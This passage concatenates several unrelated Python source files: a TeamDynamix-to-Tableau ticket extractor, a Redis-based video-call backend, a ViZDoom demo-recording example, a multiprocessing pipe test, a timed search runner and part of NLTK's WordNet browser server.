# with open(self.out_file, 'w') as handle:
# handle.write(new_output)
self.results['choices'] = choices
|
dailyBuilder.py
|
#!/usr/bin/python
# This Python file uses the following encoding: utf-8
#__ __ _ _ _ _
#\ \ / /__| | ___ ___ _ __ ___ ___ | |_ ___ | |_| |__ ___
# \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \ | __/ _ \ | __| '_ \ / _ \
# \ V V / __/ | (_| (_) | | | | | | __/ | || (_) | | |_| | | | __/
# \_/\_/ \___|_|\___\___/|_| |_| |_|\___| \__\___/ \__|_| |_|\___|
#
# ____ _ _ ____ _ _ _
#| _ \ __ _(_) |_ _ | __ ) _ _(_) | __| | ___ _ __
#| | | |/ _` | | | | | | | _ \| | | | | |/ _` |/ _ \ '__|
#| |_| | (_| | | | |_| | | |_) | |_| | | | (_| | __/ |
#|____/ \__,_|_|_|\__, | |____/ \__,_|_|_|\__,_|\___|_|
# |___/
# Written by Micah Cooper
# This code extracts data from TeamDynamix and places it into a local database for advanced manipulation.
# 1. Get basic info for all tickets in range
#
# ┌─────────────────────┐ ┌───────────────────┐
# │ │◀────POST /api/tickets/search────┤ │
# │ │ │ send_request │ ┌──────────┐
# │ TeamDynamix │────────ID, CreationDate────────▶│ │─upsert──▶│ sqlite │
# │ │ │ │ └──────────┘
# │ │ └───────────────────┘
# └─────────────────────┘
#
#
# 2. Get expanded info for each ticket
#
#
# ┌─────────────────────┐ ┌───────────────────┐
# │ │◀───GET /api/tickets/{ticketid}──┤ │
# │ │ │ getticket │ ┌──────────┐
# │ TeamDynamix │───────────all stuffs───────────▶│ │─upsert──▶│ sqlite │
# │ │ │ │ └──────────┘
# │ │ └───────────────────┘
# └─────────────────────┘
#
#
# 3. Loop through tickets to build how many
# open each day
#
#
# ┌─────────────────────┐ ┌───────────────────┐ count
# │ │◀─────────────│ dailyextract() │───────(int)───────────▶
# │ │ └───────────────────┘
# │ SQLite │──┐
# │ │ │
# │ │ │
# └─────────────────────┘ │
# ▲ │
# │ │
# └─────────────┘
# 4. (optional) Upload subset of summary results into webservice for cross-comparison
earliestdate = '2015-07-01 00:00:00'
# coding: utf-8
import json
import yaml
import os
import shutil
import errno
import sqlite3
# import urllib
# import urllib2
import requests
import time
from datetime import datetime
from datetime import timedelta
#import dateutil
from dateutil import parser
#from tableausdk import *
#tfrom tableausdk.Extract import *
import pytz
#from tzlocal import get_localzone
from tableausdk import *
from tableausdk.Extract import *
#import msgpack
#from io import BytesIO
import readchar
#import xml.etree.cElementTree as ET
import sys, traceback
import copy
from threading import Thread
import getpass
# if zlib, get fancier compression
import zipfile
try:
import zlib
compression = zipfile.ZIP_DEFLATED
except:
compression = zipfile.ZIP_STORED
# Globals
domain = ""
def updatelabels(domain):
twbedit('best.edu', domain)
datestr = datetime.now().strftime("%Y-%m-%d %H:%M")
twbedit('xx/xx/xxxx', datestr)
def twbedit(textToSearch, textToReplace):
#print "searching for " + textToSearch + "\n"
# from http://stackoverflow.com/questions/17140886/how-to-search-and-replace-text-in-a-file-using-python
filein = 'dist/TDAnalysis.twb'
fileout = 'dist/TDAnalysis.twb'
f = open(filein,'r')
filedata = f.read()
f.close()
newdata = filedata.replace(textToSearch,textToReplace)
f = open(fileout,'w')
f.write(newdata)
f.close()
def getToken(username, password):
# Get Bearer Token
# POST https://teamdynamix.com/TDWebApi/api/auth
global domain
"""
:rtype: object
"""
try:
response = requests.post(
url="https://app.teamdynamix.com/TDWebApi/api/auth",
headers={
"Content-Type": "application/json",
},
data=json.dumps({
"username": username,
"password": password
})
)
#print('Bearer HTTP Status Code: {status_code}'.format(
# status_code=response.status_code))
if 200 != response.status_code:
print('Bearer HTTP Status Code: {status_code}'.format(
status_code=response.status_code))
return None
#print('Response HTTP Response Body: {content}'.format(
# content=response.content))
domain = username.split("@")[-1]
return response.content
except requests.exceptions.RequestException:
print('HTTP Request failed')
conn.commit()
conn.close()
def send_request(token, lastStart):
# Get Recent Tickets
# POST https://teamdynamix.com/TDWebApi/api/tickets/search
"""
:rtype: object
"""
querystart = lastStart.strftime("%Y-%m-%d %H:%M:%S")
print "Downloading data from TeamDynamix.\nQuery period starts {start}".format(start=querystart)
try:
#print "Bearer {token}".format(token=token)
response = requests.post(
url="https://teamdynamix.com/TDWebApi/api/tickets/search",
headers={
"Authorization": "Bearer {token}".format(token=token),
"Content-Type": "application/json",
},
data=json.dumps({
"UpdatedDateFrom": querystart,
"MaxResults": 0
})
)
        print('Connected and beginning work')
if 200 != response.status_code:
print('Response HTTP Status Code: {status_code}'.format(
status_code=response.status_code))
return None
# print('Response HTTP Response Body: {content}'.format(
# content=response.content))
data = response.json()
return data
except requests.exceptions.RequestException:
print('HTTP Request failed')
conn.commit()
conn.close()
def upsert(c, row):
"""
:type row: object
"""
rec = [row['AccountName'], row['TypeCategoryName'], row['TypeName'], row['SlaName'], row['IsSlaResolveByViolated'],
row['CreatedDate'], row['ResponsibleGroupName'], row['ServiceName'], row['ServiceCategoryName'],
row['CompletedDate'], row['ID'], row['DaysOld'], row['ResolveByDate']]
c.execute("INSERT OR REPLACE INTO tickets (AccountName, TypeCategoryName, TypeName, SlaName, IsSlaResolveByViolated, CreatedDate, ResponsibleGroupName, ServiceName, ServiceCategoryName, CompletedDate, ID, DaysOld, ResolveByDate) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)", rec)
def getData(token, c, lastStart):
tdson = send_request(token, lastStart)
if tdson is None:
return False
else:
print "Processing tickets"
for ticket in tdson:
#print ticket
upsert(c, ticket)
#print ticket['ID']
return True
def getlast(c):
c.execute("SELECT MAX(trackdate) FROM tdbatch")
data = c.fetchone()[0]
earlystring = 'SELECT "' + earliestdate + '"'
#print earlystring
c.execute(earlystring)
tdate = parser.parse(c.fetchone()[0])
if data:
greatestdate = parser.parse(data)
lastdate = max(greatestdate, tdate)
else:
lastdate = tdate
#lastdate = lastdate - timedelta(minutes=2)
return lastdate
def checkconfig(config):
if config is None:
return False
if 'username' not in config:
return False
elif 'password' not in config:
return False
elif 'school' not in config:
return False
else:
return True
def doconfig(config):
u = None
p = None
s = None
if config is None:
config = dict()
if 'username' not in config:
print "Enter your TeamDynamix username (not SSO): ",
u = raw_input()
if u is None:
sys.exit(0)
else:
u = config['username']
if 'password' not in config:
#print "Enter your TeamDynamix password: ",
p = getpass.getpass('Enter your TeamDynamix password (will not display – not SSO): ')
#p = raw_input()
if p is None:
sys.exit(0)
else:
p = config['password']
if 'school' not in config:
print "Enter your school name: ",
s = raw_input()
else:
s = config['school']
token = getToken(u,p)
if token is None:
doconfig(None)
else:
config['username'] = u
config['password'] = p
config['school'] = s
with open ('data/config.yml', 'w') as outfile:
outfile.write(yaml.dump(config, default_flow_style=False))
return token
def basicextract(cursor):
print "Building Tableau Extract"
os.chdir("data")
basicfile = 'alltickets.tde'
# Tableau SDK does not allow reading an extract, so updating an existing
# one is moot – so we delete it first
try:
os.remove(basicfile)
except OSError:
pass
# then build a new one
new_extract = Extract(basicfile)
# build our schema
table_definition = TableDefinition()
table_definition.addColumn('ID', Type.INTEGER)
table_definition.addColumn('AccountName', Type.UNICODE_STRING)
table_definition.addColumn('TypeCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('TypeName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCreatedDate', Type.DATETIME)
table_definition.addColumn('ServiceName', Type.UNICODE_STRING)
table_definition.addColumn('ServiceCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCompletedDate', Type.DATETIME)
table_definition.addColumn('ResolveByDate', Type.DATETIME)
table_definition.addColumn('DaysOld', Type.INTEGER)
# Table always needs to be named Extract *shrug*
new_table = new_extract.addTable('Extract', table_definition)
# Query our db
cursor.execute("SELECT ID, AccountName, TypeCategoryName, TypeName, datetime(CreatedDate, 'localtime') AS LocalCreatedDate, ServiceName, ServiceCategoryName, datetime(CompletedDate, 'localtime') AS LocalCompletedDate, DaysOld, ResolveByDate FROM tickets")
for ID, AccountName, TypeCategoryName, TypeName, LocalCreatedDate, ServiceName, ServiceCategoryName, LocalCompletedDate, DaysOld, ResolveByDate in cursor.fetchall():
#print ID, AccountName
# Create new row
new_row = Row(table_definition) # Pass the table definition to the constructor
# Set column values. The first parameter is the column number (its
        # ordinal position). The second parameter (or second and subsequent parameters) is
# the value to set the column to.
new_row.setInteger(0, ID)
new_row.setString(1, AccountName)
new_row.setString(2, TypeCategoryName)
new_row.setString(3, TypeName)
d = parser.parse(LocalCreatedDate)
new_row.setDateTime(4, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_row.setString(5, ServiceName)
new_row.setString(6, ServiceCategoryName)
d = parser.parse(LocalCompletedDate)
new_row.setDateTime(7, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
d = parser.parse(ResolveByDate)
new_row.setDateTime(8, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_row.setInteger(9, DaysOld)
new_table.insert(new_row)
# Close the extract in order to save the .tde file and clean up resources
new_extract.close()
os.chdir(bindir)
def dailyextract(cursor):
print "Building Tableau Daily Extract"
os.chdir('data')
dailyfile = 'dailyopen.tde'
    # Tableau SDK does not allow reading an extract, so updating an existing
# one is moot – so we delete it first
try:
os.remove(dailyfile)
except OSError:
pass
# then build a new one
new_extract = Extract(dailyfile)
# build our schema
table_definition = TableDefinition()
table_definition.addColumn('ID', Type.INTEGER)
table_definition.addColumn('AccountName', Type.UNICODE_STRING)
table_definition.addColumn('TypeCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('TypeName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCreatedDate', Type.DATETIME)
table_definition.addColumn('ServiceName', Type.UNICODE_STRING)
table_definition.addColumn('ServiceCategoryName', Type.UNICODE_STRING)
table_definition.addColumn('LocalCompletedDate', Type.DATETIME)
table_definition.addColumn('DisplayDate', Type.DATETIME)
# Table always needs to be named Extract *shrug*
new_table = new_extract.addTable('Extract', table_definition)
# build a daily loop starting with earliest date in the db
minraw = cursor.execute('SELECT date(MIN(CreatedDate), "localtime") FROM tickets').fetchone()[0]
if minraw:
mindate = parser.parse(minraw)
else:
mindate = parser.parse(earliestdate)
maxraw = cursor.execute('SELECT date(MAX(CreatedDate), "localtime") FROM tickets').fetchone()[0]
if maxraw:
maxdate = parser.parse(maxraw)
else:
maxdate = datetime.now()
loopdate = mindate
while loopdate < maxdate:
rec = [loopdate, loopdate]
cursor.execute("SELECT ID, AccountName, TypeCategoryName, TypeName, datetime(CreatedDate, 'localtime') AS LocalCreatedDate, ServiceName, ServiceCategoryName, datetime(CompletedDate, 'localtime') AS LocalCompletedDate FROM tickets WHERE datetime(CreatedDate, 'localtime') < ? AND (datetime(CompletedDate, 'localtime') > ? OR CompletedDate IS NULL)", rec)
#print "daily processing date: " + str(loopdate)
for ID, AccountName, TypeCategoryName, TypeName, LocalCreatedDate, ServiceName, ServiceCategoryName, LocalCompletedDate in cursor.fetchall():
# print ID, AccountName
# Create new row
new_row = Row(table_definition) # Pass the table definition to the constructor
# Set column values. The first parameter is the column number (its
            # ordinal position). The second parameter (or second and subsequent parameters) is
# the value to set the column to.
new_row.setInteger(0, ID)
new_row.setString(1, AccountName)
new_row.setString(2, TypeCategoryName)
new_row.setString(3, TypeName)
d = parser.parse(LocalCreatedDate)
#if( CreatedDate.find(".") != -1) :
# d = datetime.strptime(CreatedDate, "%Y-%m-%d %H:%M:%S.%f")
#else :
# d = datetime.strptime(CreatedDate, "%Y-%m-%d %H:%M:%S")
new_row.setDateTime(4, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_row.setString(5, ServiceName)
new_row.setString(6, ServiceCategoryName)
d = parser.parse(LocalCompletedDate)
new_row.setDateTime(7, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
d = loopdate
new_row.setDateTime(8, d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond/100 )
new_table.insert(new_row)
loopdate = loopdate + timedelta(days=1)
# Close the extract in order to save the .tde file and clean up resources
new_extract.close()
os.chdir(bindir)
def displaychoices(cats):
i = 0
print "\nPress q when done selecting"
for cat in cats:
if cat[1]:
print u"\u2611" + " " + str(i) + ". " + cat[0]
else:
print u"\u2610" + " " + str(i) + ". " + cat[0]
i += 1
def uploadquiz(cats, unit, desc):
startstr = "| Which of these Categories refers to "
fullstr = startstr + unit + " (" + desc + ")? |"
strlen = len(fullstr)
secstr = "Press q when done selecting"
secstrlen = len(secstr) + 4
buflen = int((strlen - secstrlen) / 2)
flsecstr = "| " + " "*buflen + secstr + " "*(strlen-(secstrlen+buflen)) + " |"
headfoot = "-" * strlen
print "\n" + headfoot
print fullstr
print flsecstr
print headfoot
ansarray = []
ans = ""
displaychoices(cats)
numchoices = len(cats)
while True:
ans = readchar.readkey()
if ans == 'q':
break
elif ans.isdigit():
ansint = int(ans)
if ansint < numchoices:
cats[ansint][1] = not cats[ansint][1]
displaychoices(cats)
#elif ans in 'q':
# break
# elif ans == '0x03'
# sys.exit(0)
#else:
# print ans
# break
#print "......"
#print u"\u2611"
#print ans
#return int(ans)
def uploadsubset(conn):
print "\n"
print "Hi!\n"
print "** Would you like to opt in to sharing some aggregate data? (Totally FERPA safe – just basic stats!) **\n"
while True:
helpful = readchar.readkey()
if helpful == 'y':
print "\nYay!\n"
break
if helpful == 'n':
print "\nOkay :'(\n"
return
# first we get all the type categories
catsql = 'SELECT DISTINCT TypeCategoryName FROM tickets'
c.execute(catsql)
catret = c.fetchall()
# build a pristine list with everything set to false
cats = []
for cat in catret:
cats.append([cat[0], False])
# Then copy the list for each grouping
# first, incidents
inccats = copy.deepcopy(cats)
uploadquiz(inccats, "Incidents", "Worked yesterday, but not today")
# then, SRs
srcats = copy.deepcopy(cats)
uploadquiz(srcats, "Service Requests", "Stuff you want, but it's not our fault")
# then, Changes
ccats = copy.deepcopy(cats)
uploadquiz(ccats, "Changes", "Official Changes")
#print cats[ans]
#icat = cats[uploadquiz(cats, "Incidents", "broken things")]
#print icat
def doextracts(threadname, threadno):
    if threadname:
        pass  # no-op; the thread name is not used here
tconn = sqlite3.connect('data/td2.db')
tc = tconn.cursor()
dailyextract(tc)
tconn.commit()
tconn.close()
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def zipfolder(foldername, target_dir):
zipobj = zipfile.ZipFile(foldername + '.twbx', 'w', zipfile.ZIP_DEFLATED)
rootlen = len(target_dir) + 1
for base, dirs, files in os.walk(target_dir):
for file in files:
fn = os.path.join(base, file)
zipobj.write(fn, fn[rootlen:])
def makemagic():
with zipfile.ZipFile('dist/TDAnalysis.twbx', "r") as z:
z.extractall("data/pytmp")
z.close()
try:
os.remove("data/pytmp/Data/data/alltickets.tde")
except OSError:
pass
try:
os.remove("data/pytmp/Data/data/dailyopen.tde")
except OSError:
pass
#try:
os.rename("dist/TDAnalysis.twb", "data/pytmp/TDAnalysis.twb")
os.rename("data/dailyopen.tde", "data/pytmp/Data/data/dailyopen.tde")
os.rename("data/alltickets.tde", "data/pytmp/Data/data/alltickets.tde")
#except OSError:
# print "Serious OS error. Exiting\n"
# sys.exit(1)
try:
os.remove("TDAnalysis.twbx")
except OSError:
pass
zipfolder('TDAnalysis', 'data/pytmp') #insert your variables here
sys.exit()
def prepdist():
# Grab the latest version of TDAnalysis.twb from GitHub
make_sure_path_exists('dist')
twbxtemplate = 'dist/TDAnalysis.twbx'
try:
print "Grabbing latest template from GitHub"
r = requests.get('https://raw.githubusercontent.com/coopermj/TeamDynamixFun/master/dist/TDAnalysis.twbx')
if 200 != r.status_code:
            print('Could not download template – HTTP Status Code: {status_code}'.format(status_code=r.status_code))
sys.exit(1)
f = open(twbxtemplate, 'w')
f.write(r.content)
f.close()
r.close()
except:
print('HTTP Request failed')
sys.exit(1)
try:
with zipfile.ZipFile(twbxtemplate, 'r') as z:
z.extractall('data/template')
except:
print ('extraction failed')
# copy twb for manipulation
srcfile = 'data/template/TDAnalysis.twb'
shutil.copy(srcfile,'dist/TDAnalysis.twb')
# _ __ __ _ _ _ _
#/ | | \/ | __ _(_)_ __ ___ ___ __| | ___ ___| |_ __ _ _ __| |_ ___
#| | | |\/| |/ _` | | '_ \ / __/ _ \ / _` |/ _ \ / __| __/ _` | '__| __/ __|
#| |_ | | | | (_| | | | | | | (_| (_) | (_| | __/ \__ \ || (_| | | | |_\__ \
#|_(_) |_| |_|\__,_|_|_| |_| \___\___/ \__,_|\___| |___/\__\__,_|_| \__|___/
#
# _
#| |__ ___ _ __ ___
#| '_ \ / _ \ '__/ _ \
#| | | | __/ | | __/
#|_| |_|\___|_| \___|
#
bindir = os.getcwd()
#os.chdir("..")
#basedir = os.getcwd()
#confdir = bindir + '/config'
#tdedir = basedir + '/tde_repo'
# Initial setup operations
make_sure_path_exists('data')
conffile = 'data/config.yml'
try:
config = yaml.safe_load(open(conffile))
except:
config = None
token = doconfig(config)
conn = sqlite3.connect('data/td2.db')
prepdist()
c = conn.cursor()
c.execute('PRAGMA journal_mode=OFF;') # bump da speed
conn.commit()
# Create tables if they do not exist
c.execute('''CREATE TABLE IF NOT EXISTS tdbatch
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
trackdate INTEGER
)''')
c.execute('''CREATE TABLE IF NOT EXISTS tdruns
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
proc TEXT,
runStart INT,
runEnd INT
)''')
c.execute('''CREATE TABLE IF NOT EXISTS tickets
(ID INTEGER PRIMARY KEY,
AccountName TEXT,
TypeCategoryName TEXT,
TypeName TEXT,
SlaName TEXT,
IsSlaResolveByViolated INTEGER,
CreatedDate INT,
ResolveByDate INT,
ResponsibleGroupName TEXT,
ServiceName TEXT,
ServiceCategoryName TEXT,
CompletedDate INT,
DaysOld INT)''')
# c.execute('SELECT MAX(runStart) FROM tdruns WHERE runEnd IS NOT NULL')
now = datetime.now()
rec = ['getTickets', now]
c.execute('INSERT INTO tdruns(proc, runStart) VALUES(?,?)', rec)
conn.commit()
trackdate = getlast(c)
wegood = getData(token, c, trackdate)
#wegood = True # for debugging
if wegood is False:
sys.exit(1)
else:
rec = [trackdate]
c.execute('INSERT INTO tdbatch (trackdate) VALUES(?)', rec)
conn.commit()
rec = [now]
c.execute('INSERT INTO tdbatch (trackdate) VALUES(?)', rec)
then = datetime.now()
rec = [then, now]
c.execute('UPDATE tdruns SET runEnd = ? WHERE runStart = ?', rec)
conn.commit()
# Due to the vagaries of using update dates instead of created dates,
# we get old tickets in the flow that we need to terminate
delstring = 'DELETE FROM tickets WHERE CreatedDate < "' + earliestdate + '"'
c.execute(delstring)
conn.commit()
updatelabels(domain)
#thread.start_new_thread(doextracts, ("doextract",1))
#threads = []
basicextract(c)
conn.commit()
#t = Thread(target=doextracts, args=("doextract",0))
#t.start()
#t.join()
dailyextract(c)
conn.commit()
c.close()
#uploadsubset(c)
# do the file switcharoo
makemagic()
conn.close()
|
local_backend.py
|
import socket
import time
import threading
import redis
from database import *
import json
from call_maker import *
from call_listener import *
import multiprocessing
'''
The backend_server runs in a separate process, and it communicates with:
- Electron: Using a socket
- Python processes: Using pipes
The Python processes are mainly:
- call maker
- call listener
- video server
- audio server
- video receiver
- audio receiver
'''
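# Illustrative sketch (not part of the original module): the main loop below is
# driven entirely by Redis string keys, so a front end or a quick manual test can
# exercise it by writing the same keys it reads. Assuming a local Redis server
# and backend_server_redis() already running in another process:
#
#   import redis
#   r = redis.Redis()
#   r.set("username", "alice")        # picked up while status == "waiting_username"
#   r.set("correspondent_id", "0")    # index into the cached online list
#   r.set("status", "initiate_call")  # asks the backend to start a call
#   r.set("status", "quit")           # asks the backend to shut down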
def start_call_maker(ip, r):
main_thread = InitiateCallThread(1, "call maker", 1, ip, r)
main_thread.start()
main_thread.join()
print("Ended the call making process.")
def start_call_listener(r):
main_thread = CallListeningThread(1, "call listener", 1, r)
main_thread.start()
main_thread.join()
print("Ended the call listening process.")
def online_list_listener(r: redis.Redis):
print("Online list listener started.")
while True:
status = r.get("status").decode("utf-8")
if status == 'quit':
r.set("online_list", "[]")
break
if status != 'home':
time.sleep(0.5)
continue
online_list = get_online_users()
res = []
count = 0
for i in online_list:
entry = {
'id': count,
'name': i['name'],
'ip': i['ip']
}
res.append(entry)
count += 1
# print(res)
r.set("online_list", json.dumps(res))
time.sleep(0.2)
def backend_server_redis():
r = redis.Redis()
r.set("status", "waiting_username")
r.set("use_video", "TRUE")
r.set("use_audio", "TRUE")
r.set("show_video", "TRUE")
r.set("show_audio", "TRUE")
r.set("online_list", "[]")
r.set("incoming_status", "waiting_username")
r.set("outgoing_status", "waiting_username")
r.set("username", "")
r.set("correspondent_id", "")
r.set("correspondent_ip", "")
r.set("correspondent_name", "")
r.set("current_video_frame", "")
r.set("python_status", "ON")
r.set("own_webcam", "")
r.set("other_webcam", "")
current_username = ""
online_list_listener_thread = threading.Thread(target=online_list_listener, args=(r,))
while 1:
# Check status first
status = r.get("status").decode('utf-8')
if status == "waiting_username":
# Check username
username = r.get("username").decode('utf-8')
if username != current_username:
print(f'Username in Python: {username}')
signup(username)
go_online(username, get_my_private_ip())
current_username = username
# todo start the call listener here
call_listener_process = multiprocessing.Process(target=start_call_listener, args=(r,))
call_listener_process.start()
print("Started the call listener process.")
if not online_list_listener_thread.is_alive():
online_list_listener_thread.start()
r.set("status", "home")
elif status == "home":
continue
# todo check if I need to do anything here (maybe reset vars after a call)
elif status == "incoming":
ip = r.get("correspondent_ip")
if ip != "":
name = get_username_by_ip(ip)
r.set("correspondent_name", name)
incoming_status = r.get("incoming_status")
if incoming_status == "declined":
# We should restart the call listener because it quits when we decline.
call_listener_process = multiprocessing.Process(target=start_call_listener, args=(r,))
call_listener_process.start()
print("Started the call listener process.")
r.set("status", "home")
elif incoming_status == "accepted":
r.set("status", "call")
elif status == "initiate_call":
i = int(r.get("correspondent_id").decode('utf-8'))
online_users = list(get_online_users())
ip = online_users[i]['ip']
name = online_users[i]['name']
r.set("correspondent_ip", ip)
r.set("correspondent_name", name)
# todo start the call making thread
call_maker_process = multiprocessing.Process(target=start_call_maker, args=(ip, r,))
go_offline(current_username)
call_maker_process.start()
print("Started the call maker process.")
r.set("status", "calling")
r.set("calling_status", "ringing")
elif status == "calling":
calling_status = r.get("calling_status").decode("utf-8")
if calling_status == "ringing":
continue
elif calling_status in ["line_busy", "cancelled", "declined", "error"]:
go_online(current_username, get_my_private_ip())
r.set("status", "home")
elif calling_status == "accepted":
r.set("status", 'call')
else:
print("ERROR: Unexpected calling status.")
# Check for making a call
make_call = r.get("make_call")
if make_call:
r.get("correspondent_id")
# todo start the call making thread (will check for use_video and use_audio)
# todo check incoming call (maybe in the call listening thread)
# todo
status = r.get("status").decode('utf-8')
# print(status)
if status == 'quit':
go_offline(current_username)
kill_listener()
break
# Sleep between polls
time.sleep(0.1)
|
record_multiplayer.py
|
#!/usr/bin/python3
#####################################################################
# This script presents how to use Doom's native demo mechanism to
# record multiplayer game and replay it with perfect accuracy.
#####################################################################
# WARNING:
# WARNING:
# Due to a bug in the built-in bots, recording a game with bots will result in desynchronization of the recording.
from multiprocessing import Process
import os
from random import choice
import vizdoom as vzd
def player1():
game = vzd.DoomGame()
game.load_config(os.path.join(vzd.scenarios_path, "multi_duel.cfg"))
game.add_game_args("-host 2 -deathmatch +timelimit 1 +sv_spawnfarthest 1 ")
game.add_game_args("+name Player1 +colorset 0")
# Unfortunately multiplayer game cannot be recorded using new_episode() method, use this command instead.
game.add_game_args("-record multi_rec.lmp")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Game finished!")
print("Player1 frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
game.close()
def player2():
    game = vzd.DoomGame()
    game.load_config(os.path.join(vzd.scenarios_path, "multi_duel.cfg"))
game.set_window_visible(False)
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(vzd.GameVariable.FRAGCOUNT))
game.close()
def replay_as_player2():
    game = vzd.DoomGame()
    game.load_config(os.path.join(vzd.scenarios_path, "multi_duel.cfg"))
    # At this moment ViZDoom will crash if there is no starting point - this is a workaround for the multiplayer map.
game.add_game_args("-host 1 -deathmatch")
game.init()
# Replays episode recorded by player 1 from perspective of player2.
game.replay_episode("multi_rec.lmp", 2)
while not game.is_episode_finished():
game.advance_action()
print("Game finished!")
print("Player1 frags:", game.get_game_variable(vzd.GameVariable.PLAYER1_FRAGCOUNT))
print("Player2 frags:", game.get_game_variable(vzd.GameVariable.PLAYER2_FRAGCOUNT))
game.close()
# Delete multi_rec.lmp
os.remove("multi_rec.lmp")
if __name__ == '__main__':
print("\nRECORDING")
print("************************\n")
p1 = Process(target=player1)
p1.start()
player2()
print("\nREPLAY")
print("************************\n")
replay_as_player2()
|
test_pipe.py
|
import multiprocessing as mp
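# Overview: this module wires three processes into a pipeline, prod -> square ->
# double, over three duplex Pipes. Each stage closes every pipe end it does not
# use, so that once the upstream writer closes its end recv() raises EOFError and
# the stage exits cleanly; test_pipes() then drains the last pipe in the parent.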
def prod(pipe):
out_conn, _ = pipe
for x in range(10):
out_conn.send(x)
out_conn.close()
def square(pipe1, pipe2):
close, in_conn = pipe1
close.close()
out_conn, _ = pipe2
try:
while True:
x = in_conn.recv()
out_conn.send(x * x)
except EOFError:
out_conn.close()
def double(unused_pipes, in_pipe, out_pipe):
for pipe in unused_pipes:
close, _ = pipe
close.close()
closep, in_conn = in_pipe
closep.close()
out_conn, _ = out_pipe
try:
while True:
x = in_conn.recv()
out_conn.send(x * 2)
except EOFError:
out_conn.close()
def test_pipes():
pipe1 = mp.Pipe(True)
p1 = mp.Process(target=prod, args=(pipe1,))
p1.start()
pipe2 = mp.Pipe(True)
p2 = mp.Process(target=square, args=(pipe1, pipe2,))
p2.start()
pipe3 = mp.Pipe(True)
p3 = mp.Process(target=double, args=([pipe1], pipe2, pipe3,))
p3.start()
pipe1[0].close()
pipe2[0].close()
pipe3[0].close()
try:
while True:
print(pipe3[1].recv())
except EOFError:
print("Finished")
if __name__ == '__main__':
test_pipes()
|
auto_search.py
|
import os
from multiprocessing import Process
import time
runfile = "./run_search.py"
compiler = ['python']
#time limited subprocess
def run_script(i, program, search):
print("Running {} compiler on program {} using search strategy {}...".format(i,program+1,search+1))
os.system('{} {} -p {} -s {} >> planning_output.txt'.format(i,runfile,program+1,search+1))
def script_driver(max_time):
for i in compiler:
for program in range(3):
for search in range(10):
script = Process(target=run_script, args=(i,program,search))
script.start()
run_time = 0
sleep_time = 10
while 1:
time.sleep(sleep_time)
run_time += sleep_time
if not script.is_alive():
break
if run_time > max_time:
script.terminate()
print("...")
os.system('echo "Air Cargo Problem {} using search strategy {}, run time exceeded {} seconds." >> planning_output.txt'.format(program+1, search+1, max_time))
break
def main():
script_driver(600) #max runtime 10 minutes.
if __name__ == "__main__":
main()
|
wordnet_app.py
|
# Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2019 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database. It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients.
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
        Logs messages to the given file. If this option is not specified,
        messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
        shut down the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be developed to ensure this continues to work in the face of
# changes to other NLTK packages.
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
import sys
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import unquote_plus
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value of server_mode
# gets set by demo().
server_mode = None
# If set this is a file object for writing log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_head()
def do_GET(self):
global firstClient
sp = self.path[1:]
if unquote_plus(sp) == "SHUTDOWN THE SERVER":
if server_mode:
page = "Server must be killed with SIGTERM."
type = "text/plain"
else:
print("Server shutting down!")
os._exit(0)
elif sp == "": # First request.
type = "text/html"
if not server_mode and firstClient:
firstClient = False
page = get_static_index_page(True)
else:
page = get_static_index_page(False)
word = "green"
elif sp.endswith(".html"): # Trying to fetch a HTML file TODO:
type = "text/html"
usp = unquote_plus(sp)
if usp == "NLTK Wordnet Browser Database Info.html":
word = "* Database Info *"
if os.path.isfile(usp):
with open(usp, "r") as infile:
page = infile.read()
else:
page = (
(html_header % word) + "<p>The database info file:"
"<p><b>"
+ usp
+ "</b>"
+ "<p>was not found. Run this:"
